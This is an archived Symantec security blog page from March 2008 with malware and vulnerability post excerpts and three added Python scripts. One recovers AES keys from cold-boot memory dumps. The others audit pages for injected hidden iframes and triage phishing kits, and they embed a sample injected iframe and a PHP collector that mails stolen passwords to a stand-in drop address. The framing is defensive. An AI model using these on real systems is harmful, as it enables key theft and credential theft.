Symantec Connect

Security Response
Audit Your Web Server Lately?
Joji Hamada | March 28, 2008
0 comments

Web servers being hacked is nothing new, and Web administrators continue to maintain their servers in an attempt to prevent it from happening. Well, it might be a good time for everyone to audit their servers again, because today we have confirmed yet another campaign of IFRAME injection attacks. Earlier this month we saw a similar mass attack, making this a popular theme so far this year.

Earlier today, Dancho Danchev, a security consultant, published a blog about another batch of servers being injected with malicious code, and we have confirmed the attack here at Symantec. IFRAME code has been inserted into Web pages on these servers, leading to rogue security software and codec sites, which in turn lead to downloads of Trojan.Zlob variants and downloaders. These threats ultimately attempt to install misleading applications onto the compromised computers.

Please avoid the IP addresses below, which are hosting the unwanted files, for the time being...

Tags: Endpoint Protection (AntiVirus), Malicious Code, Security, Security Response
Practical Cold Boot Attacks
Joshua Talbot | March 27, 2008
0 comments

Building on the Cold Boot research that was released in February of 2008, Tom Liston and Sherri Davidoff of Intelguardians presented "Cold Memory Forensics Work Shop" at CanSecWest 2008. That research showed that the supposed volatility of conventional RAM is a half truth: in many cases memory continues to hold state for seconds, and sometimes even minutes, after a system has been powered off.

In a Cold Boot attack, an attacker with physical access to a system reboots the computer and dumps the contents of RAM for forensic analysis, recovering sensitive information (passwords, encryption keys, documents, etc.). In the Cold Memory Forensics Work Shop, Tom and Sherri discussed their findings in leveraging the Cold Boot techniques to harvest information from systems exposed during penetration testing, as well as their work in developing tools that will help quickly identify passwords that were stored in memory. Their goal is to be able to retrieve...
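The script below is an added example, not Intelguardians' tool and not code from the original post. It shows the other half of what a cold-boot dump gives an attacker: finding encryption keys. Rather than looking for a 16-byte AES key (which is indistinguishable from random data), it looks for the 176-byte expanded key schedule that most software AES implementations keep in RAM, as the February 2008 Cold Boot paper proposed. The schedule's internal structure lets a candidate key be verified against the 160 bytes that follow it, and a small bit-error budget lets a schedule that has started to decay still be recognized. The memory image (seeded random filler), the key (the FIPS-197 Appendix A test key) and the two decayed bits are constructed for the demonstration; on a real dump you would pass the file contents to find_aes128_keys.

```python
"""Locate AES-128 key schedules in a raw memory image, tolerating a few decayed bits."""
import random

SCHEDULE_LEN = 176          # 11 round keys x 16 bytes for AES-128
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def _rotl8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xFF


def _build_sbox():
    """Generate the AES S-box from GF(2^8) inverses plus the affine map (no 256-entry literal to mistype)."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3 (3 generates the field)
        q ^= (q << 1) & 0xFF                                     # q /= 3, so q stays 1/p
        q ^= (q << 2) & 0xFF
        q ^= (q << 4) & 0xFF
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _build_sbox()


def expand_key_128(key):
    """FIPS-197 key expansion: 16-byte key -> 176-byte schedule (round keys 0..10)."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = t[1:] + t[:1]                 # RotWord
            t = [SBOX[b] for b in t]          # SubWord
            t[0] ^= RCON[i // 4 - 1]          # Rcon
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return bytes(b for word in w for b in word)


def hamming(a, b):
    """Number of differing bits between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def _round1_word0(key):
    """Cheap prefilter: first word of round key 1 is w0 ^ SubWord(RotWord(w3)) ^ Rcon[1]."""
    t = [SBOX[key[13]] ^ 0x01, SBOX[key[14]], SBOX[key[15]], SBOX[key[12]]]
    return bytes(a ^ b for a, b in zip(key[:4], t))


def find_aes128_keys(image, max_bit_errors=0):
    """Return (offset, key_hex, bit_errors) for every window whose next 160 bytes expand from its first 16."""
    hits = []
    for off in range(len(image) - SCHEDULE_LEN + 1):
        key = image[off:off + 16]
        if hamming(_round1_word0(key), image[off + 16:off + 20]) > max_bit_errors:
            continue                          # rejects almost every offset after four table lookups
        errors = hamming(expand_key_128(key)[16:], image[off + 16:off + SCHEDULE_LEN])
        if errors <= max_bit_errors:
            hits.append((off, bytes(key).hex(), errors))
    return hits


# Constructed image: seeded random filler, the FIPS-197 test key's schedule at 512,
# and a copy with two decayed bits at 2000 (the decay pattern is invented for the demo).
SAMPLE_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")


def build_sample_image(size=4096, seed=2008):
    rng = random.Random(seed)
    image = bytearray(rng.getrandbits(8) for _ in range(size))
    schedule = expand_key_128(SAMPLE_KEY)
    image[512:512 + SCHEDULE_LEN] = schedule
    decayed = bytearray(schedule)
    decayed[40] ^= 0x01
    decayed[100] ^= 0x80
    image[2000:2000 + SCHEDULE_LEN] = decayed
    return bytes(image)


if __name__ == "__main__":
    image = build_sample_image()
    print("exact:", find_aes128_keys(image))
    print("up to 8 bit errors:", find_aes128_keys(image, max_bit_errors=8))
```

With an exact match the decayed copy is missed; with a budget of a few bits it is found and reported with its error count. The defensive reading is the same as the talk's: anything that must stay secret in RAM (disk-encryption keys above all) is recoverable by someone with physical access unless the machine is powered off long enough for memory to clear, or the key is never held in plain form in DRAM.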

Tags: Endpoint Protection (AntiVirus), Emerging Threats, Security, Security Response
Neosploit Updated with Exploit
Sean Hittel | March 26, 2008
0 comments

Sometime over the recent Easter weekend, an update to the Neosploit Web attack toolkit showed up on DeepSight honeypots. The new Neosploit version is being served mainly from traffic exchange sites, but some mainstream sites, such as those for restaurants, were also serving up the infectious content.

The main addition in the new iteration of Neosploit is an exploit for the CA BrightStor 'AddColumn()' ListCtrl.ocx ActiveX Control Buffer Overflow Vulnerability. There is no patch available for this vulnerability as of this writing.

The 2008 versions of NAV, NIS, and N360v2 will catch this exploit as “MSIE CA BrightStor ActiveX BO”, although most of the time the new Neosploit version will be detected as the other vulnerabilities exploited by the toolkit: MDAC, NCTAudioFile2, GOM Player, WebViewFolderIcon setSlice(), and Daxctle.OCX KeyFrame.

CA BrightStor 'AddColumn()' ListCtrl.ocx ActiveX Control Buffer Overflow...

Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
Yet another Site Falls Prey to XP Antivirus
Vikram Thakur | March 25, 2008
0 comments

A couple of weekends ago, I was doing exactly what most computer users do in their free time. I was sitting in front of the computer, visiting sites that I have no business with. One site led to another and I eventually started looking for some old friends I had lost contact with over the years. One such search led me to Spoke.com, a business networking site. Using the Spoke search box soon had me believing that my computer might be infected and I would soon need to scan it for malicious programs. OK, I didn't really believe it because I was laughing a bit too much, trying to understand what the "warning" was trying to tell me:



...

Tags: Endpoint Protection (AntiVirus), Security, Security Risks, Security Response
The Stars See Malicious Code in Your Future
Hannah Chen | March 24, 2008
0 comments

Recently, we observed some suspicious activity on the Chinese Yahoo astrology site, http://astrology.cn.yahoo.com. Upon investigation, we determined that the site in question contained an iframe linking to the domain luckty.com, an astrology-based match-finding company. That page in turn contained an embedded iframe linking to a malicious site that was exploiting the Real Player ierpplug.dll ActiveX Control Buffer Overflow Vulnerability and the MSIE ADODB.Stream Object File Installation Weakness to download malicious code onto the visitor's machine.

We contacted our friends at Yahoo, who subsequently removed all iframe references pointing to luckty.com. Symantec antivirus products that include Browser Protection, a feature that detects...
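Both this post and "Audit Your Web Server Lately?" above come down to the same artifact on disk: an iframe that the site owner did not put there, usually sized to 0x0 or 1x1 or styled invisible, pointing at a host the site has no business framing. The script below is an added example (not code from either post and not a Symantec tool) that audits the pages under a document root for exactly that, and also decodes the document.write(unescape('%3Ciframe...')) wrapper injections commonly use so that a plain grep for "<iframe" does not miss them. ALLOWED_HOSTS, the file extensions and the sample page (with documentation-range IP addresses) are assumptions for the demonstration.

```python
"""Audit web content for injected or hidden <iframe> elements."""
import os
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Hosts this site legitimately frames (assumption for the example; set for your own site).
ALLOWED_HOSTS = {"www.example.com", "example.com"}


class IframeCollector(HTMLParser):
    """Record the attributes of every <iframe> start tag seen."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(value):
    """'0', '0px', '1%' -> the number; missing or non-numeric -> None."""
    digits = re.sub(r"[^0-9]", "", value or "")
    return int(digits) if digits else None


def is_hidden(attrs):
    """Injected frames are usually 0x0/1x1 or styled away so the visitor sees nothing."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    return (w is not None and w <= 1) or (h is not None and h <= 1)


# document.write(unescape('%3Ciframe...')) keeps the literal tag out of the file.
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.I | re.S)


def decode_layers(html):
    """Yield the page itself plus every unescape()'d string it contains, decoded."""
    yield html
    for _, payload in UNESCAPE_RE.findall(html):
        yield unquote(payload)


def audit_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return one finding per iframe that is hidden or points off-site."""
    findings = []
    for layer in decode_layers(html):
        parser = IframeCollector()
        parser.feed(layer)
        for attrs in parser.iframes:
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            external = bool(host) and host not in allowed_hosts
            hidden = is_hidden(attrs)
            if external or hidden:
                findings.append({"src": src, "host": host, "external": external, "hidden": hidden})
    return findings


def audit_tree(root, exts=(".html", ".htm", ".php", ".js")):
    """Walk a document root and map each file to its findings (clean files are omitted)."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = audit_html(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample page: one legitimate frame, one injected 0x0 frame to a bare IP,
# and one frame hidden inside document.write(unescape(...)).
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://www.example.com/widget.html" width="300" height="200"></iframe>
<iframe src="http://203.0.113.7/in.cgi?3" width="0" height="0" frameborder="0"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2F198.51.100.9%2Fgo.php%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_PAGE):
        print(finding)
```

Run audit_tree against the live document root and against the copy in version control or your last clean backup; anything the live tree flags that the clean copy does not is the injection, and the diff between the two files tells you where the attacker wrote. A clean run is a first pass, not a proof: the script does not unwind eval()'d or string-split JavaScript, and an attacker who can write to your pages can also edit server-side templates and .htaccess, so treat a confirmed injection as a server compromise to be investigated, not a page to be cleaned.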

Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
Cloning Shop for Mac Users Now Open!
Alfredo Pesoli | March 21, 2008
0 comments

This week, our friends at Trend blogged about a new misleading application for the Mac. We decided to take a look at it as well. The application, named iMunizator, is a variant of the well known rogue antivirus product called Macsweeper, which we have blogged about previously.

When launched, iMunizator performs a full scan of the system and soon after it reports the "problems" that it found. Worryingly, some of the files detected by iMunizator are actually safe system binaries that should never be removed, files with "app" extensions. See the screenshot below:



...

Tags: Endpoint Protection (AntiVirus), Security, Security Risks, Security Response
Recent Apple Security Update
Symantec Security Response | March 21, 2008
0 comments

This sort of news certainly doesn't come around as frequently or on as strict a schedule, but it is nonetheless just as important as (for example) Microsoft's well known "Patch Tuesdays." On Tuesday, March 18th, Apple released a comprehensive security update for Mac OS X 10.4.11 and Mac OS X 10.5.2, as well as a security update package for its Safari Web browser. Apple doesn't follow the same monthly release schedule as its largest competitor, but that doesn't affect the importance of such a security update.

Since the release of these security updates, we have come across all kinds of news feeds and blogs that refer to it as a patch release. Calling it a "patch release" has of course raised the ire of users and readers alike, with arguments ranging from the size of the downloads to comparisons with Microsoft or Linux updates. Some people have referred to it as a software upgrade, but we must call for calm in the industry. :-) Instead of...

Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
Another Reason to Patch Microsoft Jet Vulnerabilities
Elia Florio | March 20, 2008
0 comments

Vulnerabilities in Microsoft Access and MSJET40.DLL have been discussed in many blogs recently. Our friends at Panda blogged about a possible (new?) vulnerability in the MS Jet library on March 3rd, and McAfee also blogged this past December about a different vulnerability reported on Bugtraq. Here at Symantec we have also reported some of these vulnerabilities to Microsoft, along with the many targeted attacks carried out with .mdb files since March 2006, but the usual sort of response is roughly this:

"You appear to be reporting an issue with a file type Microsoft considers to be unsafe. Many programs, such as Internet Explorer and Outlook, automatically block these files. For more information, please visit http://support.microsoft.com/kb/925330"

This sentence translates into a very simple equation: .mdb = .exe...

Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
Millennial Workforce: IT Risk or Benefit?
Samir Kapuria | March 19, 2008
0 comments

This is an issue I explored in a blog post several months ago, IT Risk and the Millennials, which really seemed to resonate with customers and industry peers. Feedback ranged from "great article," to "how are others addressing this choice vs. control dilemma?" to skepticism about this theory and the desire to see more quantifiable research validating my previous thoughts.

So, with all of this in mind, we did just that. We went out and commissioned a study with Applied Research-West to measure IT risk issues surrounding the emerging millennial workforce within companies. The study was conducted with 600 people, including three groups of 200 respondents each: IT decision makers, millennial workers (born after 1980), and older workforce (born before 1980). Our goal was to measure millennial workers' perceptions...

Tags: Endpoint Protection (AntiVirus), IT Risk Management, Security, Security Response
38,911 Bytes Free
Marvin Fabuli | March 18, 2008
0 comments

I was thinking about computers the other day, which I'm prone to do on occasion, and I realized that I still harbor fond memories of the Commodore64 that I begged my parents to buy for "the family" back in the early 80s. The Fabulis had resisted the lure of the Commodore VIC-20 (barely) for a little while, but when my older brother vacated the homestead for university and the city, the modern technology provided by the C64 moved into his empty bedroom. The C64 played a large part in forming the basis of my interest in computing and IT. Coupled with the fact that I now had unrestricted access to the room that had only weeks earlier been OFF-LIMITS, these two factors meant that I now had two brand new worlds to conquer.

Oh. I mentioned the family earlier. Of the thousands of hours of service the Commodore64 provided, my parents might have spent 24 hours on it between them. The rest of the time I was playing games, showing off for my mom using...

Tags: Endpoint Protection (AntiVirus), Security, Spam, Security Response
Spammers Exploit the Tax Season
Kelly Conley | March 17, 2008
0 comments

As reported in the February State of Spam report, we have observed spammers disguising themselves as the IRS and dangling an offer of a tax refund to unwitting recipients. That is, a refund made available once you input your credit card information into their site. A site that does not bear the IRS URL. A site that is fraudulent and nothing more than a collection tool for credit card and other personal information. And while we are still seeing this, we have recently observed a few new types of spam in relation to tax season. This spam is of a more sinister type, as it directs you to download a virus.

In one example, the spammer indicates that a new law requires you to download tax software. Well, that in itself is ridiculous because taxes are traditionally done on paper and there is no...

Tags: Endpoint Protection (AntiVirus), Security, Spam, Security Response
Phishing for Easter Eggs
Candid Wueest | March 14, 2008
0 comments

There are hundreds of ready-for-use phishing kits available on the Internet. At the beginning of this month, a list with more than 400 links was circulated on mailing lists and forums. Some kits are a compilation of different sophisticated scripts that can spoof many different brands at once and sometimes even bypass two-factor authentication schemes. However, the vast majority are simply archived copies of the original Web site, modified to include a small PHP script that will send the stolen credentials to an email account.

We know that not all phishers have a Ph.D. in the art of phishing; therefore, you can sometimes find some interesting and funny pieces of code in phishing kits found on the Internet. As Easter is coming up soon, I decided to compile a top five list of the funniest Easter eggs that I have seen in phishing kits lately.

In 5th place: Local image paths
Sometimes, phishers do not check if all links are converted correctly....
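The "small PHP script that sends the stolen credentials to an email account" is also the most useful thing in a kit from a responder's point of view, because the drop address is what you report to the mail provider and what you watch for in outbound mail from a compromised host. The script below is an added example (my code, not from the post and not from any kit) that triages an unpacked kit: it finds each mail() call, resolves its recipient through simple string assignments and the base64_decode() wrapper kits commonly use to hide the address, and records the real site the victim is redirected to afterwards. The sample collector script is constructed for the demonstration, with example.net/example.org addresses; the field names and the file extensions scanned are my assumptions.

```python
"""Triage an unpacked phishing kit: where do the stolen credentials go?"""
import base64
import os
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# First argument of mail() / @mail(): the recipient expression.
MAIL_CALL_RE = re.compile(r"@?\bmail\s*\(\s*([^,]+?)\s*,", re.I)
# $var = "literal"; or $var = 'literal';
ASSIGN_RE = re.compile(r"""(\$\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')\s*;""")
# $var = base64_decode("...");  (kits hide the drop address this way)
B64_ASSIGN_RE = re.compile(r"""(\$\w+)\s*=\s*base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)\s*;""")
B64_LITERAL_RE = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
# header("Location: ..."): the genuine site the victim is bounced to after submitting.
LOCATION_RE = re.compile(r"""header\(\s*(['"])Location:\s*([^'"]+)\1""", re.I)


def _b64_text(payload):
    """Decode a base64 literal to text; anything that is not valid base64 yields ''."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-8", "replace")
    except ValueError:
        return ""


def analyze_kit_file(source):
    """Resolve mail() recipients through assignments and base64; also list every address in the file."""
    variables = {}
    for var, dq, sq in ASSIGN_RE.findall(source):
        variables[var] = dq or sq
    for var, payload in B64_ASSIGN_RE.findall(source):
        variables[var] = _b64_text(payload)

    drops, calls = set(), []
    for arg in MAIL_CALL_RE.findall(source):
        arg = arg.strip()
        resolved = variables.get(arg, arg.strip("'\""))
        found = EMAIL_RE.findall(resolved)
        calls.append({"argument": arg, "resolved": found or None})   # None = could not resolve
        drops.update(found)

    everything = set(EMAIL_RE.findall(source))
    for payload in B64_LITERAL_RE.findall(source):
        everything.update(EMAIL_RE.findall(_b64_text(payload)))

    return {
        "drop_addresses": sorted(drops),
        "all_addresses": sorted(everything | drops),
        "mail_calls": calls,
        "redirects": [target for _, target in LOCATION_RE.findall(source)],
    }


def analyze_kit(root):
    """Walk an unpacked kit and report per PHP file (files with nothing of interest are omitted)."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".php5", ".phtml", ".inc")):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    result = analyze_kit_file(fh.read())
                if result["mail_calls"] or result["all_addresses"] or result["redirects"]:
                    report[path] = result
    return report


# Constructed sample of a kit's collector script (not a real kit).
# The base64 value is generated here so the sample stays readable.
_B64_DROP = base64.b64encode(b"dropbox.two@example.org").decode()
SAMPLE_KIT = """<?php
$ip = getenv("REMOTE_ADDR");
$message .= "Username: ".$_POST['username']."\\n";
$message .= "Password: ".$_POST['password']."\\n";
$recipient = "dropbox.one@example.net";
$backup = base64_decode("%s");
$subject = "New rezult from ".$ip;
$headers = "From: support@bank.example.com";
mail($recipient, $subject, $message, $headers);
@mail($backup, $subject, $message, $headers);
header("Location: https://www.bank.example.com/login");
?>""" % _B64_DROP

if __name__ == "__main__":
    import json
    print(json.dumps(analyze_kit_file(SAMPLE_KIT), indent=2))
```

Keeping drop_addresses (what mail() actually sends to) separate from all_addresses matters: the spoofed From: header in the sample is an address too, but reporting it would point at the brand being impersonated rather than the phisher. A mail_calls entry with resolved set to None is the script telling you it hit string concatenation, eval() or an include it did not follow, and that file needs a manual read.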

Tags: Endpoint Protection (AntiVirus), Online Fraud, Security, Security Response
Your Friendly Password Archiver
Candid Wueest | March 13, 2008
0 comments

We all know that you should back up your data periodically if you don't want to lose it in the case of an incident. This is not as trivial as it used to be. You might have some information stored remotely in online services. Most likely you will have an online email account and may want to have those emails archived on your local backup drive.

So I wasn't surprised when I saw an article last week on Jeff Atwood's blog about someone searching for a way to archive emails from Gmail. By the way, any IMAP client would do the job. The sad part of the story was that the guy stumbled on a shareware tool called G-Archiver. After playing around with the software, he discovered that there is a hard-coded Gmail account with a password in this application. After doing some more analysis, it was evident that this tool not only archives your emails locally; it will...

Tags: Endpoint Protection (AntiVirus), Security, Security Risks, Security Response
Trojan.Trafbrush: Providing Click Fraud Services to Affiliates
Chen Yu | March 12, 2008
0 comments

My colleague, Takashi Katsuki, posted a blog that describes how Trojan.Farfli provides a service to affiliates, which allows them to increase the number of hits for an affiliate’s tracker. Recently I came across another Trojan, which provides such a service: Trojan.Trafbrush.

When Trojan.Trafbrush is executed, it drops several components and registers a browser helper object (BHO). It then downloads two configuration files from 1.mailhunt.cn. One of the files is config.ini, which contains display options of a...

Tags: Endpoint Protection (AntiVirus), Online Fraud, Security, Security Response
Microsoft Patch Tuesday for March 2008
Robert Keith | March 11, 2008
0 comments

Hello and welcome to this month’s blog on the Microsoft patch releases. This month, Microsoft will release four bulletins that cover a total of 12 vulnerabilities.

Of those, 11 are rated ‘critical’ and one is rated ‘important’. Two of the critical issues affect Office Web Components and have the potential to be the worst of the bunch. Office Web Components are installed as part of multiple applications. The vulnerabilities affecting them can be triggered by simply visiting a web page with some attacker-controlled content. Seven of the critical issues affect Microsoft Excel and require a victim to open a malicious file to trigger the vulnerability. The remaining issues affect Outlook and Office.

Microsoft’s summary of the March releases can be found here:
http://www.microsoft.com/technet/security/bulletin/ms08-mar.mspx

1....

Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
About Security Response Blog

Our security research centers around the world provide unparalleled analysis of and protection from malware, security risks, vulnerabilities, and spam.

© 2010 Symantec Corporation